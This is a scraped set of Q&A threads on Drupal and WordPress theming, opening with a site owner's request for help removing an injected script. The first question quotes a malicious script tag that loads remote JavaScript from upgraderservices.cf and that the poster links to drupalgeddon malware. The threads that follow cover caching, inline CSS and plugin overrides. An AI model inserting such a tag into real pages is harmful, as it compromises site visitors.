In one of my elder Drupal 7 installations I found this js reference in my pages source code.
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>
According to my google search this could be caused by drupalgeddon malware. I have read some hints how to clean the system, but most of them recommend to restore the server from a previous backup. However, I do not want to loose current comments and would like to make a manual cleanup.
Where and how is this script added? I thought it might be included with drupal blocks. But when I disabled all blocks the script remains.
I think it must be somewhere in the drupal bootstrap procedure. Any ideas where to start and in which file (php?) additional drupal.js is added ?
In my case (drupal 7) the hack was inserted in the html source of all blocks with only an image. About 10 instances in my case. I deleted them by editing the content of the blocks in the user interface in 'source-mode'.
Related
This is probably a dumb question, but I'm worried :
I have published a website on a server, then made some changes to a css file.
As the css file was already cached by my browser, it didn't display the changes.
deleting the cash allowed to display the changes.
Now my worry is that if some users have previously been to the website, and it is cached by their browser, if I make a change they wouldn't be able to see it.
How do you guys prevent this ? Do you just change the file names ?
Sorry for my noobness,
Thanks.
There are a number of solutions floating around the web, but as far as I can tell they all boil down to changing the CSS filenames whenever their content changes. That way you steer clear of user caches and server caches serving old content.
Variants:
Instead of changing the name of the file itself, create a symbolic link with a new name to the old file whenever content changes.
Instead of changing the name of the file, change the way it is referenced by the page. Replacing myfile.css?v=1 by myfile.css?v=2 circumvents people's caches.
Write code that automatically changes the name or the link name or the way the file is referenced
Use a framework that does one of the above.
And: remember that the same problem applies to any content that might be cached, like JS files.
I am working on this webpage:http://hypoinvest.sk/ which runs on Wordpress with this theme If you check source code you can see a lot of inline-css and I want to know in which files are actually defined. Only thing what I know about it they are called by function wp_head() in header.php. I have local copy of all files on this web and I can't find any mention about some of that css rules through unix grep. Anyone suspect where these css rules could be located?
check site and let me know.
Run a search in the source code for
style-inline
As this appears to be the 'handle' designated as the first variable in the function wp_add_inline_style. The "-css" is added automatically. You'll see this on line 79 of the page source.
https://codex.wordpress.org/Function_Reference/wp_add_inline_style
You want to check your page back-end site where you put content ,
I think are you using any compose or editor to create page on edit page.
check it edit option it has some inline css.
Does anyone know where i can find the code that makes the user/permissions checkbox page in drupal? I'd like to see how it's done to make something similar for a custom module i'm building.
The function you're looking for is theme_checkbox($element) and can be found in root/includes/form.inc. If you ever want to know what function/template is responsible for a certain HTML element then Theme developer is your friend.
Enable the module, set the permissions and you'll see a small checkbox Themer info. Then just point to the HTML part you're interested and see what theme function/template is doing the rendering.
i think on default module folder there is user folder on user.admin.inc file contain code for permission function is user_admin_perm(); see this code
I'm pretty sure I've read somewhere that you can actually move the main plugin *.php file to somewhere else (I assume under your theme directory) to have it safe in case you made changes to it and your plugin updates. I tried Google but I can't find anything. Google page with good results will suffice.
I've just experienced a situation where my 2 plugins which had its layout changed and accommodated my needs and I want to make sure it doesn't happen again. Apart from having the main file in another location, is there a way to move along any CSS and JS files as well?
In Concrete5 CMS there is a nice way of doing this, by creating a new folder inside a block of an addon (may be regarded as a WP plugin), inside of which you can create copies of main file, any CSS and JS files and then you can simply edit them and choose that template for a page location you are using that block in.
I assume there is no such thing in Wordpress but how close can I get?
UPDATE: I found where I applied that advice on creating a new instance of the file then moving it to the theme directory.
The plugin in question was HL-Twitter. These are the plugin files:
admin.php
archive.php
functions.php
hl_twitter.php
hl_twitter_archive.php
hl_twitter_widget.php
import.php
widget.php
Now, this is the top contents (commented out) of the hl_twitter_widget.php:
Widget Theme for HL Twitter
To change this theme, copy hl_twitter_widget.php
to your current theme folder, do not edit this
file directly.
Available Properties:
$before_widget
$after_widget
$before_title
$after_title
$widget_title
$show_avatars
$show_powered_by
$num_tweets: how many tweets to show
$tweets: array of $tweet
$tweet: object representing a tweet
$tweet->twitter_tweet_id
$tweet->tweet
$tweet->lat
$tweet->lon
$tweet->created
$tweet->reply_tweet_id
$tweet->reply_screen_name
$tweet->source
$tweet->screen_name
$tweet->name
$tweet->avatar
$user: represents the Twitter user (ONLY SET IF SHOWING A SINGLE USERS TWEETS!)
$user->twitter_user_id
$user->screen_name
$user->name
$user->num_friends
$user->num_followers
$user->num_tweets
$user->registered
$user->url
$user->description
$user->location
$user->avatar
So I was wrong about copying the main file (in this case hl_twitter.php), but still - this enabled me to edit the file outside the plugin directory and the system somehow checks for its existence and picks it up if exists.
If this behavior something that is natively supported by Wordpress or it has been integrated in the plugin itself?
With themes, Wordpress has a concept of "child themes" which allows exactly that: to keep changes separate from main theme, in case it changes.
I haven't yet found a way to do this with plugins.
I'm using a few tactics myself:
I bump plugin version to a very high number like 99.9. This way Wordpress won't ever update the plugin.
Store my plugins in version control (i use git, but it doesnt matter), this allows you to update the plugin, run the 'diff' tool and see what changes happend. If you don't like you just revert like it would be a bad code you've written. But this approach requires a bit of skill.
Are you talking about running parts of a modified 3rd party plugin, and an updated version, at the same time?
That's not going to be possible. There is no magical method of "preserve my changes and transfer them into the new version automatically". The way to go here is doing a diff between the edited version and the update, and integrating the changes in the actual source files.
The bottom line is, if you manually edit a third party plugin, you're in for manual review (and possibly rework) once an update takes place. That's why it's usually not a good idea to extensively modify third party plugins.
Well in fact, yes! There is some kind of way.
You have to remove the to be modificated plugin's original actions/filters and then add your altereted actions/filters.
If the desired plugin is even coded in OOP you can just inherit the whole class and rewrite the wanted functions (oh sorry: "methods". we're talking about OOP ;) ). Instantiate your inherited class and rest as above.
Maybe there are better ways! I already search for a method so that the original class won't even get loaded but our altered one instead but I'm no John Carmack.
I was experiencing an odd problem where blocks were not showing up on a site. After a lot of spelunking I have found that block.tpl.php is not getting called/discovered.
Looking at the suggestions that the theme engine is trying to find it looks like the most general template it will look for is block-MODULE.tpl.php - ie if I set up symlinks for block-block.tpl.php, block-views.tpl.php etc then the content will show.
It just won't find block.tpl.php
So I can kind of make the problem go away, but I'd feel a lot better if I could fix it properly.
Anyone know why (or where) this would happen?
This is drupal 6, with a zen subtheme. zen is in sites/all/themes/ the subtheme is in sites/example.com/themes/.
(it does seem to be finding page.tpl)
PHPTemplate will find the more general templates (e.g. block.tpl.php): you can confirm this behavior by looking in the themes/garland folder which has its own block.tpl.php.
The most common reason for the template engine ignoring your template overrides is because the theme registry has not been reset. You can reset it by going to Site Configuration -> Performance and clicking Clear cached data at the bottom of the page.
Also make sure you've gone through and followed the instructions for sub-theming exactly: missing a step can produce unexpected results:
How to build your own sub-theme (6.x-2.x)
How to build your own sub-theme (6.x-1.x)
Turns out I had added a to the hook_theme() function in template.php for blocks that was pointing to a different location and confusing everyone.
Why I did that is lost to history, but it seems to server no useful purpose.
there should be a version of block.tpl.php in both the theme and subtheme directories.